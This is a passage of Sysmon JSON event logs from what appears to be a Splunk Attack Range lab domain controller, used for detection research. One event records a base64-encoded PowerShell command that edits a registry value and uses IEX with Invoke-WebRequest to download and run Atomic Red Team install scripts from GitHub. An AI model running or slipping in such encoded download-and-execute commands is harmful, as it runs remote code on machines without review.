{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.361\r\nProcessGuid: {A837DB8D-0315-5F25-0000-001077050700}\r\nProcessId: 3652\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nParentProcessId: 3852\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.361","ProcessGuid":"{A837DB8D-0315-5F25-0000-001077050700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","ParentProcessId":"3852","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nSourceProcessId: 3852\r\nSourceThreadId: 4944\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001077050700}\r\nTargetProcessId: 3652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8920(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8920(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e5824b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34024(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","SourceProcessId":"3852","SourceThreadId":"4944","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001077050700}","TargetProcessId":"3652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8920(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8920(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e5824b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34024(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363bf(wow64)","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001077050700}\r\nTargetProcessId: 3652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001077050700}","TargetProcessId":"3652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 